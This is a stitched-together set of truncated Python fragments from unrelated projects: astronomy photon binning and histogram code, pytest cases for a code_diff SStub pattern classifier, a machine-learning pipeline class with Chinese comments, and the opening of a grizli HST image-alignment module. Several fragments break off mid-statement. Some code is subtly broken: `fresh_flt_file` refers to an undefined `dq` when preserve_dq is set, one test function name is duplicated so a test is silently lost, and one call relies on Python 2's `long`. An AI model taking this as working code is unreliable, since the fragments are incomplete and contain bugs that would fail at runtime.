raise ValueError('binspec must be one of {}'.format(validspecs))
# contruct bins for each exposure according to binspec
dt = time_step
edges, valid = [], []
marker = 0
for rng in self.clean_obs_times(bandpasses):
# adjust range to fit time_range if necessary
if rng[0] >= time_range[1] or rng[1] <= time_range[0]:
continue
if rng[0] < time_range[0]:
rng[0] = time_range[0]
if rng[1] > time_range[1]:
rng[1] = time_range[1]
# make bins fot the obseration
span = rng[1] - rng[0]
mid = (rng[0] + rng[1]) / 2.0
n_exact = span/dt
if bin_method == 'elastic':
n = _np.round(n_exact) if n_exact > 1 else 1
obs_bins = _np.linspace(rng[0], rng[1], n+1)
else:
if bin_method == 'full':
n = _np.floor(n_exact)
if bin_method == 'partial':
n = _np.ceil(n_exact)
if n == 0:
continue
start, stop = mid - n*dt/2.0, mid + n*dt/2.0
obs_bins = _np.arange(start, stop+dt/2.0, dt)
if bin_method == 'partial':
obs_bins[[0,-1]] = rng
# add bins to the list
edges.extend(obs_bins)
valid.extend(range(marker, marker+len(obs_bins)-1))
marker += len(obs_bins)
edges = _np.array(edges)
valid = _np.array(valid, long)
return edges, valid
def _bandpass_filter(self, bandpasses, check_coverage=True):
"""
Parameters
----------
bandpasses
Returns
-------
inbands
"""
# groom bands input
bands = _np.array(bandpasses)
if bands.ndim == 1:
bands = _np.reshape(bands, [-1, 2])
# check that all bandpasses are fully within every observation's range
if check_coverage and not _np.all(self.check_wavelength_coverage(bands)):
raise ValueError('Some bandpasses fall outside of the observation ranges.')
# put bands in order of wavelength
order = _np.argsort(bands, 0)[:,0]
bands = bands[order]
band_edges = _np.ravel(bands)
if any(band_edges[1:] < band_edges[:-1]):
raise ValueError('Wavelength bands cannot overlap.')
# identify photons with wavelengths that fall in the wavelength bands
i = _np.searchsorted(band_edges, self['w'])
inbands = (i % 2 == 1)
return inbands
def _histogram(self, dim, bin_edges, rng, fluxed, energy_units, filter=None, background=False):
"""
Parameters
----------
dim
bin_edges
rng
fluxed
energy_units
filter
Returns
-------
counts, errors
"""
x = self[dim]
if background:
if 'r' not in self:
raise ValueError('Background region not defined for this photon set.')
if fluxed:
raise ValueError('Does not make sense to compute a fluxed background lightcurve.')
weights = self['r'] < 0
weights = weights.astype('f4')
else:
weights = self._full_weights(fluxed, energy_units)
if rng is None:
rng = bin_edges[[0,-1]]
inrng = (x > rng[0]) & (x < rng[1])
if filter is None:
filter = _np.ones(len(self), bool)
keep = filter & (weights != 0) & inrng
x = x[keep]
weights = weights[keep]
weights[_np.isnan(weights)] = 0.
counts = _np.histogram(x, bins=bin_edges, range=rng, weights=weights)[0]
variances = _np.histogram(x, bins=bin_edges, range=rng, weights=weights**2)[0]
# make sure zero or negative-count bins have conservative errors
if _np.any(counts <= 0):
if background:
variances[variances == 0] = 1
else:
signal = self['r'][keep] > 0 if 'r' in self else _np.ones(len(x), bool)
signal_counts = _np.histogram(x[signal], bins=bin_edges, range=rng)[0]
signal_counts_weighted = _np.histogram(x[signal], bins=bin_edges, range=rng, weights=weights[signal])[0]
zeros = (signal_counts == 0)
if any(zeros):
signal_counts[zeros] = 1.0
bin_midpts = (bin_edges[:-1] + bin_edges[1:]) / 2.0
signal_counts_weighted[zeros] = _np.interp(bin_midpts[zeros], bin_midpts[~zeros], signal_counts_weighted[~zeros])
avg_weight = signal_counts_weighted/signal_counts
min_variance = avg_weight**2
replace = (counts <= 0) & (variances < min_variance)
variances[replace] = min_variance[replace]
errors = _np.sqrt(variances)
return counts, errors
def _Aeff_interpolator(self,filter=None):
w, a = self['w'], self['a']
if filter is not None:
w, a = w[filter], a[filter]
isort = _np.argsort(w)
w, a = | |
<gh_stars>1-10
import code_diff as cd
from code_diff.diff_utils import parse_hunks
from code_diff import SStubPattern
# Util --------------------------------------------------------------
def compute_diff_sstub(diff):
hunks = parse_hunks(diff)
hunk = hunks[0]
diff = cd.difference(hunk.before, hunk.after, lang = "python")
return diff.sstub_pattern()
# Wrong Function name ----------------------------------------------
def test_wrong_function_name_1():
test = """
@@ -0,0 +0,0 @@ test
- test()
+ test2()
"""
assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_2():
test = """
@@ -0,0 +0,0 @@ test
- test.call()
+ test.call_async()
"""
assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_3():
test = """
@@ -0,0 +0,0 @@ test
- test.call_async('Hello World', x, x / 2)
+ test.call('Hello World', x, x / 2)
"""
assert compute_diff_sstub(test) == SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_4():
test = """
@@ -0,0 +0,0 @@ test
- test_call.call('Hello World', x, x / 2)
+ test.call('Hello World', x, x / 2)
"""
assert compute_diff_sstub(test) != SStubPattern.WRONG_FUNCTION_NAME
def test_wrong_function_name_5():
test = """
@@ -0,0 +0,0 @@ test
- test.x.call('Hello World', x, x / 2)
+ test.y.call('Hello World', x, x / 2)
"""
assert compute_diff_sstub(test) != SStubPattern.WRONG_FUNCTION_NAME
# Same Function more args -------------------------------------------
def test_same_function_more_args_1():
test = """
@@ -0,0 +0,0 @@ test
- test()
+ test(x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_2():
test = """
@@ -0,0 +0,0 @@ test
- test(x)
+ test(x, y)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_3():
test = """
@@ -0,0 +0,0 @@ test
- test(x, y)
+ test(x, y + 1)
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_4():
test = """
@@ -0,0 +0,0 @@ test
- test(x)
+ test(x, y + 1)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_5():
test = """
@@ -0,0 +0,0 @@ test
- test(x + 1)
+ test(x, y + 1)
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_6():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x)
+ test.call(x, y)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_7():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x)
+ test.call(x, y, z, d, a, call())
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_MORE_ARGS
def test_same_function_more_args_8():
test = """
@@ -0,0 +0,0 @@ test
- test.call1(x)
+ test.call(x, y, z, d, a, call())
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_MORE_ARGS
# Same Function less args -------------------------------------------
def test_same_function_less_args_1():
test = """
@@ -0,0 +0,0 @@ test
- test(x)
+ test()
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_2():
test = """
@@ -0,0 +0,0 @@ test
- test(x, y)
+ test(x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_3():
test = """
@@ -0,0 +0,0 @@ test
- test(x, y + 1)
+ test(x, y)
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_4():
test = """
@@ -0,0 +0,0 @@ test
- test(x, y + 1)
+ test(x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_5():
test = """
@@ -0,0 +0,0 @@ test
- test(x, y + 1)
+ test(x + 1)
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_6():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x, y)
+ test.call(x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
def test_same_function_less_args_7():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x, y, z, d, a, call())
+ test.call(x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_LESS_ARGS
# Same Function wrong caller -------------------------------------------
def test_same_function_wrong_caller_1():
test = """
@@ -0,0 +0,0 @@ test
- test.call()
+ test1.call()
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_WRONG_CALLER
def test_same_function_wrong_caller_2():
test = """
@@ -0,0 +0,0 @@ test
- test.x.call()
+ test.y.call()
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_WRONG_CALLER
def test_same_function_wrong_caller_3():
test = """
@@ -0,0 +0,0 @@ test
- call()
+ test.call()
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_WRONG_CALLER
# Same Function swap args -------------------------------------------
def test_same_function_swap_args_1():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x, y)
+ test.call(y, x)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_2():
test = """
@@ -0,0 +0,0 @@ test
- test.call1(x, y)
+ test.call(y, x)
"""
assert compute_diff_sstub(test) != SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_3():
test = """
@@ -0,0 +0,0 @@ test
- test.call(x, y, z)
+ test.call(y, x, z)
"""
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
def test_same_function_swap_args_auto():
import itertools
args = ["a", "b", "c", "d + 1", "0 if a != 0 else 1"]
for l in range(2, len(args)):
perm = tuple(args[:l])
for p in itertools.permutations(perm):
if p == perm: continue
test = """
@@ -0,0 +0,0 @@ test
- test.call(%s)
+ test.call(%s)
""" % (", ".join(perm), ", ".join(p))
assert compute_diff_sstub(test) == SStubPattern.SAME_FUNCTION_SWAP_ARGS
# Add function around expression -------------------------------------------
def test_add_function_around_expression_1():
test = """
@@ -0,0 +0,0 @@ test
- result = x
+ result = int(x)
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
def test_add_function_around_expression_2():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = int(x) + 1
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
def test_add_function_around_expression_3():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = int(x + 1)
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_FUNCTION_AROUND_EXPRESSION
# Add method call --------------------------------------------------------
def test_add_method_call_1():
test = """
@@ -0,0 +0,0 @@ test
- result = x
+ result = x.get()
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_2():
test = """
@@ -0,0 +0,0 @@ test
- result = x.get()
+ result = x.get().return()
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_3():
test = """
@@ -0,0 +0,0 @@ test
- result = x.y
+ result = x.y.get()
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_4():
test = """
@@ -0,0 +0,0 @@ test
- result = x.get()
+ result = x.return().get()
"""
assert compute_diff_sstub(test) == SStubPattern.ADD_METHOD_CALL
def test_add_method_call_5():
test = """
@@ -0,0 +0,0 @@ test
- result = x.get()
+ result = x.return.get()
"""
assert compute_diff_sstub(test) != SStubPattern.ADD_METHOD_CALL
def test_add_method_call_6():
test = """
@@ -0,0 +0,0 @@ test
- result = x.return().get()
+ result = x.get()
"""
assert compute_diff_sstub(test) != SStubPattern.ADD_METHOD_CALL
# Change identifier --------------------------------------------------------
def test_change_identifier_used_1():
test = """
@@ -0,0 +0,0 @@ test
- result = x
+ result = y
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_2():
test = """
@@ -0,0 +0,0 @@ test
- result = test(path = path)
+ result = test(path = path2)
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_2():
test = """
@@ -0,0 +0,0 @@ test
- result = test(path = path)
+ result = test(path2 = path)
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_3():
test = """
@@ -0,0 +0,0 @@ test
- result = test(path = path)
+ result = test2(path = path)
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_4():
test = """
@@ -0,0 +0,0 @@ test
- result = test.x(a, b, c)
+ result = test1.x(a, b, c)
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_IDENTIFIER_USED
def test_change_identifier_used_5():
test = """
@@ -0,0 +0,0 @@ test
- result = test.x(a, b, c)
+ result1 = test.x(a, b, c)
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_IDENTIFIER_USED
# Change numeric literal ----------------------------------------------------
def test_change_numeric_literal_1():
test = """
@@ -0,0 +0,0 @@ test
- result = 0
+ result = 1
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_2():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = x + 5
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_3():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = x + 5.0
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_4():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = x + 1.0
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_NUMERIC_LITERAL
def test_change_numeric_literal_5():
test = """
@@ -0,0 +0,0 @@ test
- result = x + 1
+ result = x + a
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_NUMERIC_LITERAL
# Change boolean literal ----------------------------------------------------
def test_change_boolean_literal_1():
test = """
@@ -0,0 +0,0 @@ test
- if True:
+ if False:
pass
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_2():
test = """
@@ -0,0 +0,0 @@ test
- if True and x < 0:
+ if False and x < 0:
pass
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_3():
test = """
@@ -0,0 +0,0 @@ test
- if False and x < 0:
+ if True and x < 0:
pass
"""
assert compute_diff_sstub(test) == SStubPattern.CHANGE_BOOLEAN_LITERAL
def test_change_boolean_literal_4():
test = """
@@ -0,0 +0,0 @@ test
- if False and x < 0:
+ if x / 2 == 0 and x < 0:
pass
"""
assert compute_diff_sstub(test) != SStubPattern.CHANGE_BOOLEAN_LITERAL
# Change unary operator ----------------------------------------------------
def test_change_unary_operator_1():
test | |
in input_columns:
if name in group_udf_mapping:
strategies_dict[input_column] = group_udf_mapping[name]
else:
strategies_dict[input_column] = load_udf(name, self.parse_params(strategy, name)).process
return strategies_dict
def process_strategy(self, mdf, strategy, strategy_names=None):
'''
udf处理
:param mdf: 输入数据
:param strategy: udf配置
:param strategy_names: udf名字,udf支持name在外和在内两种
:return: 处理后的数据
'''
names = strategy_names if strategy_names is not None else strategy["name"]
if names == "Output":
self.save_file(mdf.data, strategy)
return None
if names == "GroupAuc":
df = mdf.datas()
key_columns = strategy["key_columns"]
key_data = df[key_columns[0]].tolist() if len(key_columns) == 1 else [tuple(x) for x in df[key_columns].values]
group_auc, detail_auc = mmodel.cal_group_auc(df['label'].tolist(), df['pred_prob'].tolist(), key_data)
logger.info(f'group_auc = {group_auc}')
if strategy["detail"]:
logger.info(f'detail_auc : ')
for key, auc in detail_auc.items():
logger.info(f'key = {key}, auc = {auc}')
return None
elif names == "RenameColumn":
input_columns = strategy["input_columns"]
output_columns = strategy["output_columns"]
columns_dict = {}
for index, input in enumerate(input_columns):
columns_dict[input] = output_columns[index]
mdf.rename(columns_dict)
return None
elif names == "CopyColumn":
input_columns = strategy["input_columns"]
output_columns = strategy["output_columns"]
mdf.copy_column(input_columns, output_columns)
return None
elif names == "AddColumn":
input_columns = strategy["input_columns"]
value = strategy['value']
mdf.add_column(input_columns, value)
return None
elif names == "DropColumn":
mdf.drop(strategy["input_columns"])
return None
elif names == "OrderColumn":
columns = strategy["input_columns"]
if isinstance(columns, str) and "," in columns:
columns = columns.split(",")
columns = [column.strip() for column in columns]
# 增加key columns,放在最前面
key_column = [column for column in mdf.columns() if column.startswith('keys_') and column not in columns]
if len(key_column) > 0:
key_column.extend(columns)
columns = key_column
mdf.order_column(columns)
return None
input_columns = copy.deepcopy(strategy["input_columns"])
if isinstance(input_columns, dict):
logger.debug("****** parse sub strategy *******")
input_columns = self.process_strategy(mdf, input_columns)
output_columns = copy.deepcopy(input_columns) if "output_columns" not in strategy else copy.deepcopy(strategy[
"output_columns"])
split_column_count = 0 if "split_column_count" not in strategy else strategy["split_column_count"]
suffix_use_label = False if "suffix_use_label" not in strategy else strategy["suffix_use_label"]
if suffix_use_label and "labels" in strategy:
labels = copy.deepcopy(strategy["labels"])
default_label = 'others' if 'default_label' not in strategy else strategy['default_label']
labels.append(default_label)
for index, output_column in enumerate(output_columns):
pre = output_column if not isinstance(output_column, list) else output_column[0]
output_columns[index] = [pre + '_' + str(label) for label in labels]
elif split_column_count > 1:
for index, output_column in enumerate(output_columns):
pre = output_column if not isinstance(output_column, list) else output_column[0]
output_columns[index] = [pre + '_' + str(i) for i in range(split_column_count)]
prefix = "" if "output_columns_prefix" not in strategy else strategy["output_columns_prefix"]
suffix = "" if "output_columns_suffix" not in strategy else strategy["output_columns_suffix"]
for index, output_column in enumerate(output_columns):
output_columns[index] = prefix + output_column + suffix if not isinstance(output_column, list) \
else [prefix + column + suffix for column in output_column]
keep_input_columns = False if "keep_input_columns" not in strategy else strategy["keep_input_columns"]
names = names if isinstance(names, list) else [names]
logger.debug("********* start to execute strategy " + str(names) + " **********")
logger.debug("input_columns: " + str(input_columns))
logger.debug("output_columns: " + str(output_columns))
start = time.time()
for name in names:
udf = load_udf(name, self.parse_params(strategy, name))
mdf.process_udf(udf, input_columns, output_columns, keep_input_columns)
if "drop_columns" in strategy:
mdf.drop(strategy["drop_columns"])
if "select_columns" in strategy:
mdf.select(strategy["select_columns"])
logger.debug(mdf)
logger.debug(mdf.columns())
cost = time.time() - start
logger.debug("********* stop to execute strategy " + str(names) + " cost = " + str(cost) + " **********")
return output_columns
def process_model(self, df):
'''
模型处理
:param df: 输入输出
:return: 无
'''
if 'model' not in self.config:
logger.info("no model in json, ignore model process")
return
gc.collect()
config = self.config['model']
columns = df.columns.values.tolist()
logger.info("********* start process mode ********")
logger.debug(columns)
logger.debug(df)
run_mod = 'train_test' if "run_mode" not in config else config["run_mode"]
models = []
for key, model in config.items():
if key.startswith("model_"):
models.append((key[6:], model))
models.sort()
logger.debug(models)
if run_mod == "predict":
model_select = 'ModelSelect' if "model_select" not in config else config["model_select"]
group_keys = [column for column in columns if column.startswith('keys_')]
group_key_df = df[group_keys]
df.drop(group_keys, axis=1, inplace=True)
for _, model in models:
logger.debug(model)
if "model_path" not in model:
raise Exception("model_path could not be null!")
model_path = model["model_path"]
model_process = ModelProcess()
model_process.load_model(model_path=model_path)
pred_df = model_process.predict(df)
group_key_df.columns = [key[5:] for key in group_keys]
df_temp = pd.concat([group_key_df, pred_df], axis=1, sort=False)
if 'strategies' in model:
strategies = model['strategies']
mdf = MDataFrame(df_temp)
for strategy in strategies:
self.process_strategy(mdf, strategy)
df_temp = mdf.datas()
if 'Output' in model:
self.save_file(df_temp, model['Output'])
elif run_mod == "train":
group_keys = [column for column in columns if column.startswith('keys_')]
df.drop(group_keys, axis=1, inplace=True)
validation_data_percent = 0.2 if "validation_data_percent" not in config else config[
"validation_data_percent"]
validation_data_percent = 0.2 if validation_data_percent > 0.5 or validation_data_percent < 0.01 else validation_data_percent
x_df, y_df = dataprocess.split_feature_and_label_df(df)
del df
train_x_df, valid_x_df, train_y_df, valid_y_df = train_test_split(x_df, y_df,
test_size=validation_data_percent, random_state=0)
del x_df, y_df
for _, model in models:
logger.debug(model)
model_type = model["model_type"]
model_config = model["model_config"]
model_process = ModelProcess(model_type, model_config)
model_process.train_model(train_x_df, train_y_df, test_x=valid_x_df, test_y=valid_y_df)
model_process.save_model(model["model_path"])
logger.info("model saved to " + os.path.abspath(model["model_path"]))
if 'feature_importance' in model:
feature_importance = model['feature_importance']
importance_types = ['gain'] if 'importance_type' not in feature_importance else feature_importance['importance_type']
for importance_type in importance_types:
score = model_process.feature_importance(importance_type)
all_features = [score.get(f, 0.) for f in model_process.features()]
all_features = np.array(all_features, dtype=np.float32)
all_features_sum = all_features.sum()
importance_list = [[f, score.get(f, 0.) / all_features_sum] for f in model_process.features()]
importance_list.sort(key=lambda elem: elem[1], reverse=True)
print("feature importance: " + importance_type)
for index, item in enumerate(importance_list):
print(index, item[0], item[1])
elif run_mod == "test":
group_keys = [column for column in columns if column.startswith('keys_')]
group_key_df = df[group_keys]
df.drop(group_keys, axis=1, inplace=True)
x_df, y_df = dataprocess.split_feature_and_label_df(df)
del df
for _, model in models:
logger.debug(model)
if "model_path" not in model:
raise Exception("model_path could not be null!")
model_process = ModelProcess()
model_process.load_model(model_path=model["model_path"])
pred_df = model_process.evaluate_model(x_df, y_df, ana_top=0.05)
group_key_df.columns = [key[5:] for key in group_keys]
df_temp = pd.concat([group_key_df, y_df, pred_df], axis=1, sort=False)
if 'strategies' in model:
strategies = model['strategies']
mdf = MDataFrame(df_temp)
for strategy in strategies:
self.process_strategy(mdf, strategy)
df_temp = mdf.datas()
if 'Output' in model:
self.save_file(df_temp, model['Output'])
elif run_mod == "train_test":
group_keys = [column for column in columns if column.startswith('keys_')]
group_key_df = df[group_keys]
df.drop(group_keys, axis=1, inplace=True)
test_data_percent = 0.2 if "test_data_percent" not in config else config["test_data_percent"]
test_data_percent = 0.2 if test_data_percent > 0.5 or test_data_percent < 0.01 else test_data_percent
validation_data_percent = 0.2 if "validation_data_percent" not in config else config["validation_data_percent"]
validation_data_percent = 0.2 if validation_data_percent > 0.5 or validation_data_percent < 0.01 else validation_data_percent
x_df, y_df = dataprocess.split_feature_and_label_df(df)
del df
train_x_df, test_x_df, train_y_df, test_y_df = train_test_split(x_df, y_df, test_size=test_data_percent, random_state=0)
del x_df, y_df
train_x_df, valid_x_df, train_y_df, valid_y_df = train_test_split(train_x_df, train_y_df, test_size=validation_data_percent, random_state=0)
for _, model in models:
logger.debug(model)
model_process = ModelProcess(model["model_type"], model["model_config"])
model_process.train_model(train_x_df, train_y_df, test_x=valid_x_df, test_y=valid_y_df)
model_process.save_model(model["model_path"])
logger.info("model saved to " + os.path.abspath(model["model_path"]))
pred_df = model_process.evaluate_model(test_x_df, test_y_df, ana_top=0.05)
group_key_df.columns = [key[5:] for key in group_keys]
df_temp = pd.concat([group_key_df, test_y_df, pred_df], axis=1, sort=False)
if 'strategies' in model:
strategies = model['strategies']
mdf = MDataFrame(df_temp)
for strategy in strategies:
self.process_strategy(mdf, strategy)
df_temp = mdf.datas()
if 'Output' in model:
self.save_file(df_temp, model['Output'])
def save_file(self, src_df, strategy):
'''
文件保存,或结果输出
:param src_df: 数据
:param strategy: 输出策略
:return: 无
'''
df = src_df.copy(deep=True)
columns = df.columns.values.tolist()
key_columns = [column for column in columns if column.startswith('keys_')]
if len(key_columns) > 0:
group_keys = {column:column[5:] for column in key_columns}
df.drop([column[5:] for column in key_columns if column[5:] in columns], axis=1, inplace=True)
df.rename(columns=group_keys, inplace=True)
path = 'pipeline.txt' if 'path' not in strategy else strategy['path']
type = 'text' if 'type' not in strategy else strategy['type']
if path == "stdout":
field_delimiter = ',' if 'field_delimiter' not in strategy else strategy['field_delimiter']
columns = None if 'columns' not in strategy else strategy['columns']
if columns:
df = df[[column for column in columns]]
source.stdout(df, field_delimiter)
elif type == 'text':
field_delimiter = ',' if 'field_delimiter' not in strategy else strategy['field_delimiter']
columns = None if 'columns' not in strategy else strategy['columns']
header = False if self.current_batch_index > 1 else True if 'header' not in strategy else strategy['header']
path = path if not path.endswith("/") else path + time.strftime("%Y%m%d%H%M%S", time.localtime()) + ".txt"
filepath, _ = os.path.split(path)
if not os.path.exists(filepath):
os.makedirs(filepath)
df.to_csv(path, sep=field_delimiter, columns=columns, header=header, mode='a+')
elif type == "excel":
df.to_excel()
else:
logger.info("we will support type " + type + " later")
def start(config_path, **xxkwargs):
start0 = time.time()
pipeline = Pipeline(config_path, **xxkwargs)
logger.info("read and parse config cost = " + str(time.time() - start0))
start1 = time.time()
df = pipeline.read_data()
if df is not None:
logger.info("read data cost = " + str(time.time() - start1))
logger.debug(df)
start1 = time.time()
df = pipeline.process_data(df)
logger.info("process data cost = " + str(time.time() - start1))
else:
start1 = time.time()
df = | |
<gh_stars>1-10
"""
Align direct images & make mosaics
"""
import os
from collections import OrderedDict
import glob
import numpy as np
import matplotlib.pyplot as plt
# conda install shapely
# from shapely.geometry.polygon import Polygon
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
import astropy.units as u
import astropy.coordinates as coord
from astropy.table import Table
from . import utils
from . import model
from . import GRIZLI_PATH
def check_status():
"""Make sure all files and modules are in place and print some information if they're not
"""
for ref_dir in ['iref']:
if not os.getenv(ref_dir):
print("""
No ${0} set! Make a directory and point to it in ~/.bashrc or ~/.cshrc.
For example,
$ mkdir $GRIZLI/{0}
$ export {0}="$GRIZLI/{0}/" # put this in ~/.bashrc
""".format(ref_dir))
else:
### WFC3
if not os.getenv('iref').endswith('/'):
print("Warning: $iref should end with a '/' character [{0}]".format(os.getenv('iref')))
test_file = 'iref$uc72113oi_pfl.fits'.replace('iref$', os.getenv('iref'))
if not os.path.exists(test_file):
print("""
HST calibrations not found in $iref [{0}]
To fetch them, run
>>> import grizli.utils
>>> grizli.utils.fetch_default_calibs()
""".format(os.getenv('iref')))
### Sewpy
# try:
# import sewpy
# except:
# print("""
# `sewpy` module needed for wrapping SExtractor within python.
# Get it from https://github.com/megalut/sewpy.
# """)
#
check_status()
def go_all():
"""TBD
"""
from stsci.tools import asnutil
info = Table.read('files.info', format='ascii.commented_header')
# files=glob.glob('../RAW/i*flt.fits')
# info = utils.get_flt_info(files)
for col in info.colnames:
if not col.islower():
info.rename_column(col, col.lower())
output_list, filter_list = utils.parse_flt_files(info=info, uniquename=False)
for key in output_list:
#files = [os.path.basename(file) for file in output_list[key]]
files = output_list[key]
asn = asnutil.ASNTable(files, output=key)
asn.create()
asn.write()
def fresh_flt_file(file, preserve_dq=False, path='../RAW/', verbose=True, extra_badpix=True, apply_grism_skysub=True, crclean=False, mask_regions=True):
"""Copy "fresh" unmodified version of a data file from some central location
TBD
Parameters
----------
preserve_dq : bool
Preserve DQ arrays of files if they exist in './'
path : str
Path where to find the "fresh" files
verbose : bool
Print information about what's being done
extra_badpix : bool
Apply extra bad pixel mask. Currently this is hard-coded to look for
a file "badpix_spars200_Nov9.fits" in the directory specified by
the `$iref` environment variable. The file can be downloaded from
https://github.com/gbrammer/wfc3/tree/master/data
apply_grism_skysub : bool
xx nothing now xxx
Returns
-------
Nothing, but copies the file from `path` to `./`.
"""
import shutil
local_file = os.path.basename(file)
if preserve_dq:
if os.path.exists(local_file):
im = pyfits.open(local_file)
orig_dq = im['DQ'].data
else:
orig_dq = None
else:
dq = None
if file == local_file:
orig_file = pyfits.open(glob.glob(os.path.join(path, file)+'*')[0])
else:
orig_file = pyfits.open(file)
if dq is not None:
orig_file['DQ'] = dq
head = orig_file[0].header
### Divide grism images by imaging flats
### G102 -> F105W, uc72113oi_pfl.fits
### G141 -> F140W, uc72113oi_pfl.fits
flat, extra_msg = 1., ''
filter = utils.get_hst_filter(head)
### Copy calibs for ACS/UVIS files
if '_flc' in file:
ftpdir = 'https://hst-crds.stsci.edu/unchecked_get/references/hst/'
calib_types = ['IDCTAB', 'NPOLFILE', 'D2IMFILE']
if filter == 'G800L':
calib_types.append('PFLTFILE')
utils.fetch_hst_calibs(orig_file.filename(), ftpdir=ftpdir,
calib_types=calib_types,
verbose=False)
if filter in ['G102', 'G141']:
flat_files = {'G102': 'uc72113oi_pfl.fits',
'G141': 'uc721143i_pfl.fits'}
flat_file = flat_files[filter]
extra_msg = ' / flat: {0}'.format(flat_file)
flat_im = pyfits.open(os.path.join(os.getenv('iref'), flat_file))
flat = flat_im['SCI'].data[5:-5, 5:-5]
flat_dq = (flat < 0.2)
### Grism FLT from IR amplifier gain
pfl_file = orig_file[0].header['PFLTFILE'].replace('iref$',
os.getenv('iref'))
grism_pfl = pyfits.open(pfl_file)[1].data[5:-5,5:-5]
orig_file['DQ'].data |= 4*flat_dq
orig_file['SCI'].data *= grism_pfl/flat
# if apply_grism_skysub:
# if 'GSKY001' in orig_file:
if filter == 'G280':
### Use F200LP flat
flat_files = {'G280':'zcv2053ei_pfl.fits'} # F200LP
flat_file = flat_files[filter]
extra_msg = ' / flat: {0}'.format(flat_file)
flat_im = pyfits.open(os.path.join(os.getenv('jref'), flat_file))
for ext in [1,2]:
flat = flat_im['SCI',ext].data
flat_dq = (flat < 0.2)
orig_file['DQ',ext].data |= 4*flat_dq
orig_file['SCI',ext].data *= 1./flat
if filter == 'G800L':
flat_files = {'G800L':'n6u12592j_pfl.fits'} # F814W
flat_file = flat_files[filter]
extra_msg = ' / flat: {0}'.format(flat_file)
flat_im = pyfits.open(os.path.join(os.getenv('jref'), flat_file))
pfl_file = orig_file[0].header['PFLTFILE'].replace('jref$',
os.getenv('jref'))
pfl_im = pyfits.open(pfl_file)
for ext in [1,2]:
flat = flat_im['SCI',ext].data
flat_dq = (flat < 0.2)
grism_pfl = pfl_im['SCI',ext].data
orig_file['DQ',ext].data |= 4*flat_dq
orig_file['SCI',ext].data *= grism_pfl/flat
if orig_file[0].header['NPOLFILE'] == 'N/A':
